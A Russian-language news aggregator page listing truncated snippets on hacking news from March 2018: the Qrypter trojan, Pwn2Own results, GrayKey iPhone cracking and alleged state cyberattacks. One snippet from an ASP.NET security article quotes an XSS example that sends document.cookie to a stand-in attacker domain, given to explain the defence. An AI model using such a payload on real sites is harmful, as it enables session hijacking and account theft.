Компьютеры Аппаратное обеспечение
Тесты AMD Ryzen 7 2700X в 3DMark: на 18 % быстрее 1700X
Как надо собирать ферму для майнинга?
MediaTek выпускает Helio P60: 12-нм техпроцесс и искусственный интеллект
Компьютеры Интернет
Как создать сайт с помощью конструктора
Дорогое имя: во что компаниям обходится небрежность с доменными именами
Почему хостинг может быть безлимитным
Досуг Компьютерные игры
Игры Tomb Raider - от худшей к лучшей
Как стать волшебником (часть 2)
Финальная реальность: хакерам хватило 24 секунды, чтобы скопировать незащищенную Denuvo версию Final Fantasy XV. Защита снижает производительность
Компьютеры Программное обеспечение
Предприятия получат корпоративный Firefox Quantum
Иллюстрированное руководство по устройству сети в Kubernetes
Опасный троян Qrypter атакует организации по всему миру
Компьютеры Образование
"Є-мова": изучайте украинский онлайн бесплатно
ЕГЭ отменен не будет
Новые правила, санкции и "олимпийцы": эксперт о том, как пройдет ЕГЭ-2018
Образование Каталоги, порталы
УЧИТЕЛЕМ В СЕЛЬСКУЮ ШКОЛУ
Компания "АЭМ-технологии" открыла Центр сварки в Петрозаводске
Стало известно, когда начнется регистрация ВНО на магистратуру
<<   Март, 2018   >>
Пн Вт Ср Чт Пт Сб Вс
  1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31  
Компьютеры: Хакерство за сегодня

Архив рубрики

октябрь 2012
сентябрь 2012
август 2012
июль 2012
июнь 2012
май 2012
апрель 2012
март 2012
февраль 2012
январь 2012
декабрь 2011
ноябрь 2011
октябрь 2011
сентябрь 2011
август 2011
июль 2011
июнь 2011
май 2011
апрель 2011
март 2011
февраль 2011
январь 2011
декабрь 2010
ноябрь 2010
октябрь 2010
сентябрь 2010
август 2010
июль 2010
июнь 2010
май 2010
апрель 2010
март 2010
февраль 2010
январь 2010
декабрь 2009
ноябрь 2009
октябрь 2009
сентябрь 2009
август 2009
июль 2009
июнь 2009
май 2009
апрель 2009
март 2009
февраль 2009
январь 2009
декабрь 2008
ноябрь 2008
октябрь 2008
сентябрь 2008
август 2008
Опасный троян Qrypter атакует организации по всему миру InternetUA 09:47
Он был впервые описан в июне 2016 года, после того как его использовали в атаке на швейцарских пользователей, обращавшихся за визой США.
       Вредоносная программа распространяется с помощью электронных писем. Несмотря на то, что количество писем сравнительно небольшое, Qrypter продолжает набирать известность. В общей сложности 3 вредоносные кампании, зафиксированные в феврале 2018 года, затронули 243 организации, отметили эксперты.
       Оказавшись на системе, Qrypter запускает два файла VBS в папке %Temp%, каждый из которых имеет произвольное имя файла.
Исследователи заработали $267 тыс. в рамках Pwn2Own 2018 SecurityLab.ru 14:49
Pwn2Own 2018 за взлом Microsoft Edge, Apple Safari, Oracle VirtualBox и Mozilla Firefox.
       В первый день исследователь Ричард Чжу (Richard Zhu), известный под псевдонимом fluorescence, не смог взломать браузер Safari, однако продемонстрировал атаку с использованием цепочки эксплоитов для браузера
       Edge, которая принесла ему $70 тыс. Никлас Баумстарк (Niklas Baumstark) из команды Phoenhex получил $27 тыс. за взлом программного обеспечения VirtualBox, а Самуель Грос (Samuel Groъ), известный под псевдонимом saelo, заработал $65 тыс. за взлом Safari.
       Во второй день Pwn2Own 2018 Чжу заработал $50 тыс.
Хакеры выложили в интернет скрипт для взлома Windows MIGnews.com 01:03
Об этом сообщает портал Bleeping Computer.
       Вредоносная программа под названием PowerShell была опубликована на сайте Github. По словам экспертов, попав на компьютер жертвы, она запрашивает данные пользователя и в случае правильного ввода высылает их на удаленные сервера. При этом, если пользователь введет неправильные данные, программа будет запрашивать их пока жертва не введет настоящие.
       На форуме предупреждают, что процесс взлома можно остановить только до введения связки ключей, в ином случае этот процес уже не обратим.
Как выглядит устройство GRAYKEY для взлома IPHONE SiteUA 17:51
ФБР не знало кода устройства, а его сотрудники несколько раз ввели не тот пароль. При этом система безопасности iPhone предусматривает, что после 10 неправильных попыток доступ к гаджету автоматически блокируется, а все данные уничтожаются.
       - Суд обязал компанию создать программу, открывающую доступ, но Apple отказалась и обжаловала в суде это решение.
       - Впоследствии ФБР взломало пароль к телефону террориста.
Конференция DEFCON 16. "Игры с баркодами". Феликс Линднер, глава Recurity Labs Хабрахабр 22:06
Я ленивый человек, поэтому как настоящий капиталист, использую платную программу Omniplanar SwiftDecoder, она довольно дорогая, зато очень хороша.
       Большинство сканеров подсоединяются к компьютеру через USB и содержат модуль расшифровки внутри себя. Поэтому Вам не нужно использовать специальное ПО для сканера.
       Также существует разное программное обеспечение для создания штрих-кодов. С помощью бесплатных GNU программ можно создавать только одномерные штрих- коды, причем в неограниченном количестве. Можно использовать различные онлайн генераторы баркода, которые создают его с помощью PHP-скриптов, а число коммерческих программ бесконечно.
Опасные связи Рэспублiка 14:39
Например, давно не в диковинку взлом аккаунтов на сайтах знакомств. Одна из самых крупных утечек 2016 года - кража 412 млн аккаунтов в сети международных знакомств AdultFriendFinder. Годом ранее был взломан сайт Ashley Madison, специализирующийся на тайных знакомствах людей, находящихся в браке. Результат был плачевным: два самоубийства и около 37 млн имен пользователей с подмоченной репутацией. Впрочем, последствия могут быть еще масштабнее. Эксперт в сфере информационной безопасности Group-IB Александр Сушко объясняет:
       - Сегодня у киберпреступников стоит цель атаковать не конкретный компьютер или телефон, а приложение - вслед за этим злоумышленники получают доступ к сотням устройств, на которые оно установлено.
США обвинили Россию в кибератаках на энергосистему Рейтер 11:36
Бывший высокопоставленный чиновник министерства внутренней безопасности США, знакомый с реакцией американских властей на кибератаки, сказал, что количество российских попыток взлома компьютерных сетей уменьшилось после публикации анализа Symantec и уведомления, распространенного правительством в октябре, где содержались технические подробности атак.
       Чиновник отказался сказать, продолжается ли кампания сейчас, сети каких объектов хакерам удалось взломать и насколько киберпреступники могли приблизиться к контролю над системами
Украинские кибер-войска: "перехват" белорусской милиции взломали россияне Белорусский партизан 08:17
Украинские кибер-войска не имеют отношения к взлому сайта белорусской милиции perehvat.gov.by. Об этом в комментарии корреспонденту Телеграфа заявил руководитель инициативы Евгений Докукин.
       По его мнению, за взломом стоят российские хакеры, возможно, связанные с ФСБ.
       "Российские хакеры позавчера создали аккаунты в Twitter и Youtube и сайт на блог-хостинге WordPressCom. С использованием моего английского текста и фото, со своим текстом о Foreign Affairs Brigade и со ссылкой на мои посты в Facebook. Пытаются сделать вид легитимного подразделения Украинских кибер- войск, хотя такого подразделения у нас никогда не было и эти люди мне неизвестны.
Защита ASP.NET приложений от взлома Хабрахабр 10:06
уязвимости под названием Cross-Site Scripting (XSS). XSS
       Типичный пример XSS - добавление скрипта в комментарий или запись в гостевую книгу. Например, такого:
       &lt;script&gt;document.location='https://verybadcoolhacker.com/?cookie='+encodeURIComponent(document.cookie)&lt;/script&gt;
       Как вы понимаете, в данном примере куки с вашего сайта передают в качестве параметра на какой-то хакерский сайт.
       В Web Forms можно совершить ошибку с помощью примерно такого кода:
       &lt;p&gt;Извините &lt;%= username %&gt;, но пароль ошибочный&lt;/p&gt;
       Понятно, что вместо username может быть скрипт.
На сайте Кубанского казачьего войска сегодня ночью появились призывы бойкотировать выборы Эхо Москвы 14:33
В ситуации уже разбирается полиция.
       Хакеры выложили два провокационных сообщения. В одном неизвестные авторы призвали к бойкоту "циничного акта под названием "перевыборы Путина на еще один срок", передает портал Znak.com. Вторая публикация - это обращение, подписанное якобы главой международного союза общественных объединений "Всевеликое войско Донское" Николаем Козицыным.
       В тексте говорится, о тотальном прессинге на права и свободы жителей России при действующей власти, репрессивной машине ФСБ, путинских опричниках, и коррумпированном окружении президента. Козицын - участник нескольких военных конфликтов. Его группа выступала на стороне сепаратистов в войне на востоке Украины, напоминает "Медиазона".
А так не хотите? Грани.ру 12:41
Такие взломы или попытки взломов были зафиксированы в 21 штате. Дональд Трамп выиграл выборы благодаря победе в трех штатах, которые Хиллари Клинтон считала "своими", - вернее даже, в отдельных округах этих штатов.
       Кроме того, Минфин приписывает ГРУ создание и распространение в 2016 году вируса NetPetya, которое названо в пресс-релизе "самой разрушительной и крупнейшей по масштабам ущерба кибератакой в истории", затронувшей не только США, но и многие страны Европы и Азии. Наконец, Минфин напоминает, что двум офицерам ФСБ предъявлены обвинения во взломе банка личных данных полумиллиарда пользователей Yahoo.
Появились фотографии устройства GrayKey, взламывающего любые iPhone с iOS 11 PCnews.ru 08:24
GrayKey представляет из себя небольшой серый ящик с двумя Lightning- корректорами. Два iPhone могут быть подключены сразу, и их необходимо подключить примерно на две минуты для установки проприетарного программного обеспечения, предназначенного для угадывания кода доступа.
       После установки ПО запускается процесс взлома. Для четырехзначного кода достаточно нескольких часов, для шестизначного - нескольких дней.
       Как только программное обеспечение GrayKey взломает код доступа, он будет отображаться прямо на экране смартфона. Затем iPhone можно подключить обратно к GrayKey, чтобы загрузить все данные, включая незашифрованное содержимое Связки ключей. К этой информации можно получить доступ с помощью компьютера.
За взлом Safari хакер получил 65 тыс. долларов InternetUA 13:47
16 марта, конференция CanSecWest проводит один из самых масштабных конкурсов по взлому компьютерного ПО и мобильных устройств Pwn2Own.
       В этом году хакеры со всего мира боролись за фонд в $2 млн. Удача улыбнулась участнику группы phoenhex Сэмюэлю Гроссу.
       Воспользовавшись цепочкой из трех ошибок, обнаруженных в операционной системе macOS, хакер сумел взломать браузер Safari. За это достижение парень был удостоен награды в $65 000.
       Еще один успех талантливого взломщика - вывод любого текста на сенсорную панель Touch Bar в MacBook Pro.
       А вот мобильная версия Safari, запущенная на iPhone 7, взлому не поддалась.
IoT и проблемы безопасности Хабрахабр 00:06
Именно распределенная архитектура блокчейна гарантирует достаточно высокую безопасность всей IoT-системы. Но если часть из устройств сети все же будет подвержена взлому, в целом, это не скажется на общей работе системы. Упомянутое использование ботнетами "умных" устройств, работающих в IoT- системах, стало возможным вследствие их слабой защищенности. Распределенный тип доверительных отношений позволяет избавиться от взломанного устройства без ощутимого ущерба для всей модели взаимодействия между "здоровыми" объектами.
       В контексте безопасности сегодня блокчейн может использоваться в ряде сфер, в которых Интернет вещей развивается наиболее интенсивно.
Гендиректор Большого театра Беларуси - о знаковых премьерах, новых проектах и гастролях труппы Минск-Новости 12:04
Наш Виктор Саркисьян был прекраснейшим танцовщиком, в том числе в этом спектакле в главной партии. Он тоже согласился работать с нами над этой постановкой. Ну и Юрий Троян, народный артист Беларуси, художественный руководитель балета, будет обеспечивать восстановление этого балета на сцене Большого театра.
       - Поскольку наше агентство "Минск-Новости" - информационный партнер
США обвинили Москву в кибератаках на энергосистему страны Грани.ру 11:41
Об этом говорится в совместном отчете ФБР и Министерства внутренней безопасности США.
       Также атакам подверглись сети авиационных предприятий, обїектов инфраструктуры подачи воды и различных критически важных производств.
       Как утверждают американские власти, хакеры по заданию российских властей с помощью фишинга сначала заражали вредоносными программами сети небольших коммерческих предприятий. Затем они получали доступ к более важным объектам. После успешного взлома хакеры собирали данные об автоматической системе управления производством.
       В докладе рекомендуется администраторам сетей, подвергшихся атакам, провести проверку компьютеров, обновить системы безопасности и запретить несанкционированные подключения извне.
Издатель Final Fantasy XV помог пиратам взломать игру InternetUA 14:47
Для начала набили руку на предыдущей версии антихакерского ПО и получили доступ к FF XII, затем разобрались и с новинкой - с помощью файлов предзагрузки. А теперь кодеры устроили полноценный взлом, со всеми DLC и патчами в комплекте. На этот раз все вышло даже более элегантно: никакой возни с обходом Denuvo или подменой файлов. Помогла простая человеческая оплошность.
       На портале Reddit появился пост об очередном взломе творения Square Enix. Как выяснилось, создатели экшен-RPG выложили в Steam незащищенный билд игры, предназначенный, видимо, для внутренного пользования.
"Заря-1": управляй космической экспедицией SoftKey.Info 00:45
Вы являетесь командующим. Вы регламентируете действия в соответствии со сложившейся ситуацией и вашими представлениями о том, что надо делать. Совершается это через выбор одной из предлагаемых команд для отправки в чат. На развитие событий влияет даже то
Маркетинг для частной медицины: 7 решений для продвижения медицинских услуг Likar.info 20:04
Bot&Partners, ведущий в Фабрике ботов.
       Никита Подгайный, юрист Opendatabot, CEO Bot&Partners, ведущий в Фабрике ботов
       Тема: "Чат-боты для врачей и клиник: коммуникации с пациентами. От юридических аспектов и стратегии до конечного продукта".
       Во время выступления Никита подробно рассказал о целях, к которым помогут прийти медицинские чатботы, описал шаги внедрения чат-бота, если целью клиники является привлечение и сопровождение клиентов: с чего начать и на что обратить внимание. Ольга Шевченко, маркетолог, автор и ведущая курсов по подготовке удаленных ассистентов Helppy.
       Тема: "Маркетинг и работа с фрилансерами: найм, постановка задач, контроль, оплата, отчетность".
Основные приемы работы ФСБ в Интернете Корреспондент.net 00:31
Кого он боится? Поэтому, спросив вы всегда получите правдивый ответ. Но это не все. Существуют и объективные правила работы спецслужб на форумах. Главное, что нужно запомнить. В разведке многие вещи кодируются цифрой "6". Это, скорее, традиция. Подобно тому, как в математике используется 10-ричная система, в
Тренинг FastTrack. "Сетевые основы". "Основы телефонии". Часть 2. Эдди Мартин. Декабрь, 2012 PCnews.ru 00:24
Предположим, у Вас дома исчез почтовый сервер. Отключился Интернет, и когда Вы открываете Outlook или другой почтовый клиент, Вы не можете отправить письмо. Так вот, менеджер связи, как только увидит, что пропала связь с каким-либо IP клиента, тут же сообщит о том, что WAN вышел из строя. Однако мы не можем рисковать бизнесом наших клиентов. Поэтому Cisco менее чем за 3,5 месяца создала специальное программное обеспечение для роутера под названием SRST - "неуязвимая удаленная телефонная связь" - которое показывает, что наше оборудование обладает гораздо большими возможностями, чем можно представить.

Темы рубрики

  • ВЗЛОМ
  • НОВАЯ ДЫРА
  • УДАЛЕННЫЙ КОМПЬЮТЕР
  • ТРОЯН
  • СКРИПТ
  • ТРОЯНА
  • ДЫРА
  • ТРОЯНОВ
  • ПЕРЕПОЛНЕНИЕ
  • СЕРВАК
  • ВЗЛОМАТЬ
  • БУФЕР
  • СКАНИРОВАНИЕ
  • ВЕШАТЬ
  • УДАЛЕННЫЙ
  • СТАНДАРТНЫЕ СКРИПТЫ
  • ВЕРХ
  • СКРЫВАТЬ
  • ДОСТУП
  • ФАЙЛ